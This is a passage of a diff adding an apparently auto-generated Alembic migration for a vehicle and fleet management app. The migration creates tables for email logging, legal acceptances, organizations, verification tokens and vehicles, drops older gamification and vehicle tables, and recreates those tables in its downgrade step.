sa.Column('sent_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_email_logs_email'), 'email_logs', ['email'], unique=False, schema='data') + op.create_index(op.f('ix_data_email_logs_id'), 'email_logs', ['id'], unique=False, schema='data') + op.create_table('email_provider_configs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(length=50), nullable=True), + sa.Column('provider_type', sa.String(length=20), nullable=True), + sa.Column('priority', sa.Integer(), nullable=True), + sa.Column('settings', sa.JSON(), nullable=False), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('fail_count', sa.Integer(), nullable=True), + sa.Column('max_fail_threshold', sa.Integer(), nullable=True), + sa.Column('success_rate', sa.Float(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('name'), + schema='data' + ) + op.create_index(op.f('ix_data_email_provider_configs_id'), 'email_provider_configs', ['id'], unique=False, schema='data') + op.create_table('email_templates', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('type', sa.Enum('REGISTRATION', 'PASSWORD_RESET', 'GDPR_NOTICE', name='emailtype'), nullable=True), + sa.Column('subject', sa.String(length=255), nullable=False), + sa.Column('body_html', sa.Text(), nullable=False), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_email_templates_id'), 'email_templates', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_email_templates_type'), 'email_templates', ['type'], unique=True, schema='data') + op.create_table('legal_documents', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('title', sa.String(length=255), nullable=True), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('version', sa.String(length=20), nullable=False), + sa.Column('region_code', sa.String(length=5), nullable=True), + sa.Column('language', sa.String(length=5), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_legal_documents_id'), 'legal_documents', ['id'], unique=False, schema='data') + op.create_table('legal_acceptances', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('document_id', sa.Integer(), nullable=True), + sa.Column('accepted_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.Column('ip_address', sa.String(length=45), nullable=True), + sa.Column('user_agent', sa.Text(), nullable=True), + sa.ForeignKeyConstraint(['document_id'], ['data.legal_documents.id'], ), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_legal_acceptances_id'), 'legal_acceptances', ['id'], unique=False, schema='data') + op.create_table('organizations', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(), nullable=False), + sa.Column('org_type', sa.Enum('PRIVATE', 'COMPANY', name='orgtype'), nullable=True), + sa.Column('tax_number', sa.String(), nullable=True), + sa.Column('founded_at', sa.Date(), nullable=True), + sa.Column('validation_status', sa.Enum('NOT_VALIDATED', 'PENDING', 'VALIDATED', 'REJECTED', name='validationstatus'), nullable=True), + sa.Column('owner_id', sa.Integer(), nullable=True), + sa.Column('ui_theme', sa.String(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['owner_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_organizations_id'), 'organizations', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_organizations_tax_number'), 'organizations', ['tax_number'], unique=False, schema='data') + op.create_table('verification_tokens', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('token', sa.String(length=255), nullable=True), + sa.Column('token_type', sa.Enum('EMAIL_VERIFY', 'PASSWORD_RESET', name='tokentype'), nullable=True), + sa.Column('expires_at', sa.DateTime(timezone=True), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ondelete='CASCADE'), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_verification_tokens_id'), 'verification_tokens', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_verification_tokens_token'), 'verification_tokens', ['token'], unique=True, schema='data') + op.create_table('organization_members', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('org_id', sa.Integer(), nullable=True), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('role', sa.Enum('OWNER', 'ADMIN', 'FLEET_MANAGER', 'DRIVER', name='userrole'), nullable=True), + sa.Column('is_permanent', sa.Boolean(), nullable=True), + sa.ForeignKeyConstraint(['org_id'], ['data.organizations.id'], ondelete='CASCADE'), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ondelete='CASCADE'), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_organization_members_id'), 'organization_members', ['id'], unique=False, schema='data') + op.create_table('vehicles', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('vin', sa.String(), nullable=False), + sa.Column('license_plate', sa.String(), nullable=False), + sa.Column('make', sa.String(), nullable=True), + sa.Column('model', sa.String(), nullable=True), + sa.Column('year', sa.Integer(), nullable=True), + sa.Column('is_deleted', sa.Boolean(), nullable=True), + sa.Column('current_org_id', sa.Integer(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['current_org_id'], ['data.organizations.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicles_id'), 'vehicles', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_vehicles_license_plate'), 'vehicles', ['license_plate'], unique=False, schema='data') + op.create_index(op.f('ix_data_vehicles_vin'), 'vehicles', ['vin'], unique=True, schema='data') + op.drop_index(op.f('ix_data_companies_id'), table_name='companies', schema='data') + op.drop_table('companies', schema='data') + op.drop_index(op.f('ix_data_company_members_id'), table_name='company_members', schema='data') + op.drop_table('company_members', schema='data') + op.drop_table('vehicle_options_catalog', schema='data') + op.drop_index(op.f('ix_data_vehicle_ownerships_id'), table_name='vehicle_ownerships', schema='data') + op.drop_table('vehicle_ownerships', schema='data') + op.drop_table('user_stats', schema='data') + op.drop_table('alembic_version') + op.drop_index(op.f('ix_data_point_rules_action_key'), table_name='point_rules', schema='data') + op.drop_index(op.f('ix_data_point_rules_id'), table_name='point_rules', schema='data') + op.drop_table('point_rules', schema='data') + op.drop_index(op.f('ix_data_level_configs_id'), table_name='level_configs', schema='data') + op.drop_table('level_configs', schema='data') + op.drop_table('vehicle_engines', schema='data') + op.drop_index(op.f('ix_data_system_settings_key'), table_name='system_settings', schema='data') + op.drop_table('system_settings', schema='data') + op.drop_table('vehicle_models', schema='data') + op.drop_index(op.f('ix_data_points_ledger_id'), table_name='points_ledger', schema='data') + op.drop_index(op.f('ix_data_points_ledger_user_id'), table_name='points_ledger', schema='data') + op.drop_table('points_ledger', schema='data') + op.drop_index(op.f('ix_data_badges_id'), table_name='badges', schema='data') + op.drop_table('badges', schema='data') + op.drop_table('vehicle_categories', schema='data') + op.drop_table('competitions', schema='data') + op.drop_index(op.f('ix_data_service_providers_id'), table_name='service_providers', schema='data') + op.drop_table('service_providers', schema='data') + op.drop_table('vehicle_makes', schema='data') + op.drop_table('votes', schema='data') + op.drop_index(op.f('ix_data_vehicle_events_id'), table_name='vehicle_events', schema='data') + op.drop_table('vehicle_events', schema='data') + op.drop_index(op.f('ix_data_translations_id'), table_name='translations', schema='data') + op.drop_index(op.f('ix_data_translations_key'), table_name='translations', schema='data') + op.drop_index(op.f('ix_data_translations_lang_code'), table_name='translations', schema='data') + op.drop_table('translations', schema='data') + op.drop_table('staged_vehicle_data', schema='data') + op.drop_index(op.f('ix_data_locations_id'), table_name='locations', schema='data') + op.drop_table('locations', schema='data') + op.drop_index(op.f('ix_data_regional_settings_id'), table_name='regional_settings', schema='data') + op.drop_table('regional_settings', schema='data') + op.drop_table('user_badges', schema='data') + op.drop_index(op.f('ix_data_user_vehicles_id'), table_name='user_vehicles', schema='data') + op.drop_index(op.f('ix_data_user_vehicles_license_plate'), table_name='user_vehicles', schema='data') + op.drop_index(op.f('ix_data_user_vehicles_vin'), table_name='user_vehicles', schema='data') + op.drop_table('user_vehicles', schema='data') + op.drop_index(op.f('ix_data_audit_logs_id'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_id'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_type'), table_name='audit_logs', schema='data') + op.drop_table('audit_logs', schema='data') + op.drop_table('user_scores', schema='data') + op.drop_table('user_vehicle_modifications', schema='data') + op.drop_index(op.f('ix_data_vehicle_assignments_id'), table_name='vehicle_assignments', schema='data') + op.drop_table('vehicle_assignments', schema='data') + op.add_column('users', sa.Column('first_name', sa.String(), nullable=True), schema='data') + op.add_column('users', sa.Column('last_name', sa.String(), nullable=True), schema='data') + op.add_column('users', sa.Column('birthday', sa.Date(), nullable=True), schema='data') + op.add_column('users', sa.Column('is_email_verified', sa.Boolean(), nullable=True), schema='data') + op.add_column('users', sa.Column('is_banned', sa.Boolean(), nullable=True), schema='data') + op.add_column('users', sa.Column('is_gdpr_deleted', sa.Boolean(), nullable=True), schema='data') + op.add_column('users', sa.Column('previous_login_count', sa.Integer(), nullable=True), schema='data') + op.add_column('users', sa.Column('verified_at', sa.DateTime(timezone=True), nullable=True), schema='data') + op.drop_index(op.f('ix_data_users_region_code'), table_name='users', schema='data') + op.drop_column('users', 'is_superuser', schema='data') + op.drop_column('users', 'full_name', schema='data') + op.drop_column('users', 'reputation_score', schema='data') + op.drop_column('users', 'updated_at', schema='data') + op.drop_column('users', 'license_expiry_date', schema='data') + op.drop_column('users', 'role', schema='data') + op.drop_column('users', 'region_code', schema='data') + op.drop_column('users', 'id_card_expiry_date', schema='data') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.add_column('users', sa.Column('id_card_expiry_date', sa.DATE(), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('region_code', sa.VARCHAR(length=5), server_default=sa.text("'HU'::character varying"), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('role', postgresql.ENUM('SUPERUSER', 'REGIONAL_ADMIN', 'MODERATOR', 'BUSINESS_PARTNER', 'USER', name='userrole'), server_default=sa.text("'USER'::userrole"), autoincrement=False, nullable=False), schema='data') + op.add_column('users', sa.Column('license_expiry_date', sa.DATE(), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('updated_at', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('reputation_score', sa.INTEGER(), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('full_name', sa.VARCHAR(), autoincrement=False, nullable=True), schema='data') + op.add_column('users', sa.Column('is_superuser', sa.BOOLEAN(), autoincrement=False, nullable=True), schema='data') + op.create_index(op.f('ix_data_users_region_code'), 'users', ['region_code'], unique=False, schema='data') + op.drop_column('users', 'verified_at', schema='data') + op.drop_column('users', 'previous_login_count', schema='data') + op.drop_column('users', 'is_gdpr_deleted', schema='data') + op.drop_column('users', 'is_banned', schema='data') + op.drop_column('users', 'is_email_verified', schema='data') + op.drop_column('users', 'birthday', schema='data') + op.drop_column('users', 'last_name', schema='data') + op.drop_column('users', 'first_name', schema='data') + op.create_table('vehicle_assignments', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('company_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('driver_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('start_date', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.Column('end_date', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True), + sa.Column('start_odometer', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('end_odometer', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('notes', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], name=op.f('vehicle_assignments_company_id_fkey')), + sa.ForeignKeyConstraint(['driver_id'], ['data.users.id'], name=op.f('vehicle_assignments_driver_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_assignments_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_assignments_id'), 'vehicle_assignments', ['id'], unique=False, schema='data') + op.create_table('user_vehicle_modifications', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('mod_type', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('category', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('description', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('is_validated', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.Column('installed_at_km', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('cost', sa.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('user_vehicle_modifications_pkey')), + schema='data' + ) + op.create_table('user_scores', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('competition_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('points', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('last_updated', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['competition_id'], ['data.competitions.id'], name=op.f('user_scores_competition_id_fkey')), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('user_scores_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('user_scores_pkey')), + sa.UniqueConstraint('user_id', 'competition_id', name=op.f('uq_user_competition_score'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_table('audit_logs', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('target_type', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('target_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('action', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('changes', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=True), + sa.Column('ip_address', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('user_agent', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('timestamp', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('audit_logs_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('audit_logs_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_audit_logs_target_type'), 'audit_logs', ['target_type'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_target_id'), 'audit_logs', ['target_id'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_id'), 'audit_logs', ['id'], unique=False, schema='data') + op.create_table('user_vehicles', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('nickname', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('make', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('model', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('year', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('fuel_type', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('model_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('engine_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('license_plate', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('vin', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('color_code', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('manufacture_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('registration_region', sa.VARCHAR(length=5), autoincrement=False, nullable=True), + sa.Column('initial_odometer', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('current_odometer', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('mot_expiry_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('insurance_expiry_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('factory_options', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.Column('updated_at', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['engine_id'], ['data.vehicle_engines.id'], name=op.f('user_vehicles_engine_id_fkey')), + sa.ForeignKeyConstraint(['model_id'], ['data.vehicle_models.id'], name=op.f('user_vehicles_model_id_fkey')), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('user_vehicles_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('user_vehicles_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_user_vehicles_vin'), 'user_vehicles', ['vin'], unique=True, schema='data') + op.create_index(op.f('ix_data_user_vehicles_license_plate'), 'user_vehicles', ['license_plate'], unique=False, schema='data') + op.create_index(op.f('ix_data_user_vehicles_id'), 'user_vehicles', ['id'], unique=False, schema='data') + op.create_table('user_badges', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('badge_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('earned_at', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=False), + sa.ForeignKeyConstraint(['badge_id'], ['data.badges.id'], name=op.f('user_badges_badge_id_fkey')), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('user_badges_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('user_badges_pkey')), + schema='data' + ) + op.create_table('regional_settings', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('country_code', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('currency', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('is_active', sa.BOOLEAN(), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('id', name=op.f('regional_settings_pkey')), + sa.UniqueConstraint('country_code', name=op.f('regional_settings_country_code_key'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_index(op.f('ix_data_regional_settings_id'), 'regional_settings', ['id'], unique=False, schema='data') + op.create_table('locations', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('type', postgresql.ENUM('stop', 'warehouse', 'client', name='location_type_enum', schema='data'), autoincrement=False, nullable=False), + sa.Column('coordinates', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('address_full', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('capacity', sa.INTEGER(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('locations_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_locations_id'), 'locations', ['id'], unique=False, schema='data') + op.create_table('staged_vehicle_data', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('source_url', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('raw_data', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=True), + sa.Column('status', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('error_log', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('staged_vehicle_data_pkey')), + schema='data' + ) + op.create_table('translations', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('key', sa.VARCHAR(length=100), autoincrement=False, nullable=False), + sa.Column('lang_code', sa.VARCHAR(length=5), autoincrement=False, nullable=False), + sa.Column('value', sa.TEXT(), autoincrement=False, nullable=False), + sa.Column('is_published', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('translations_pkey')), + sa.UniqueConstraint('key', 'lang_code', name=op.f('uq_translation_key_lang'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_index(op.f('ix_data_translations_lang_code'), 'translations', ['lang_code'], unique=False, schema='data') + op.create_index(op.f('ix_data_translations_key'), 'translations', ['key'], unique=False, schema='data') + op.create_index(op.f('ix_data_translations_id'), 'translations', ['id'], unique=False, schema='data') + op.create_table('vehicle_events', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('event_type', postgresql.ENUM('PURCHASE_PRICE', 'TRANSFER_TAX', 'ADMIN_FEE', 'VEHICLE_TAX', 'INSURANCE', 'REFUELING', 'SERVICE', 'PARKING', 'TOLL', 'FINE', 'TUNING_ACCESSORIES', 'OTHER', name='expense_category_enum', schema='data'), autoincrement=False, nullable=False), + sa.Column('date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('odometer_value', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('odometer_anomaly', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.Column('cost_amount', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('description', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('image_paths', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=True), + sa.Column('is_diy', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.Column('service_provider_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['service_provider_id'], ['data.service_providers.id'], name=op.f('vehicle_events_service_provider_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_events_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_events_id'), 'vehicle_events', ['id'], unique=False, schema='data') + op.create_table('votes', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('provider_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('vote_value', sa.INTEGER(), autoincrement=False, nullable=False), + sa.ForeignKeyConstraint(['provider_id'], ['data.service_providers.id'], name=op.f('votes_provider_id_fkey')), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('votes_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('votes_pkey')), + sa.UniqueConstraint('user_id', 'provider_id', name=op.f('uq_user_provider_vote'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_table('vehicle_makes', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('logo_url', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_makes_pkey')), + sa.UniqueConstraint('name', name=op.f('vehicle_makes_name_key'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_table('service_providers', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('address', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('category', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('status', postgresql.ENUM('pending', 'approved', 'rejected', name='moderation_status_enum', schema='data'), autoincrement=False, nullable=False), + sa.Column('source', postgresql.ENUM('manual', 'ocr', 'api_import', name='source_type_enum', schema='data'), autoincrement=False, nullable=False), + sa.Column('validation_score', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('evidence_image_path', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('added_by_user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['added_by_user_id'], ['data.users.id'], name=op.f('service_providers_added_by_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('service_providers_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_service_providers_id'), 'service_providers', ['id'], unique=False, schema='data') + op.create_table('competitions', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), + sa.Column('start_date', postgresql.TIMESTAMP(), autoincrement=False, nullable=False), + sa.Column('end_date', postgresql.TIMESTAMP(), autoincrement=False, nullable=False), + sa.Column('is_active', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('competitions_pkey')), + schema='data' + ) + op.create_table('vehicle_categories', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name_key', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_categories_pkey')), + schema='data' + ) + op.create_table('badges', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(length=100), autoincrement=False, nullable=False), + sa.Column('description', sa.VARCHAR(length=255), autoincrement=False, nullable=False), + sa.Column('icon_url', sa.VARCHAR(length=500), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('badges_pkey')), + sa.UniqueConstraint('name', name=op.f('badges_name_key'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_index(op.f('ix_data_badges_id'), 'badges', ['id'], unique=False, schema='data') + op.create_table('points_ledger', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('points_change', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('reason', sa.VARCHAR(length=255), autoincrement=False, nullable=True), + sa.Column('timestamp', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=False), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('points_ledger_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('points_ledger_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_points_ledger_user_id'), 'points_ledger', ['user_id'], unique=False, schema='data') + op.create_index(op.f('ix_data_points_ledger_id'), 'points_ledger', ['id'], unique=False, schema='data') + op.create_table('vehicle_models', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('make_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('category_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('generation_name', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('production_start_year', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('production_end_year', sa.INTEGER(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['category_id'], ['data.vehicle_categories.id'], name=op.f('vehicle_models_category_id_fkey')), + sa.ForeignKeyConstraint(['make_id'], ['data.vehicle_makes.id'], name=op.f('vehicle_models_make_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_models_pkey')), + schema='data' + ) + op.create_table('system_settings', + sa.Column('key', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('value', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=False), + sa.Column('description', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('key', name=op.f('system_settings_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_system_settings_key'), 'system_settings', ['key'], unique=False, schema='data') + op.create_table('vehicle_engines', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('model_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('engine_code', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('fuel_type', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('displacement_ccm', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('power_kw', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('torque_nm', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('transmission_type', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('gears_count', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('drive_type', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['model_id'], ['data.vehicle_models.id'], name=op.f('vehicle_engines_model_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_engines_pkey')), + schema='data' + ) + op.create_table('level_configs', + sa.Column('id', sa.INTEGER(), 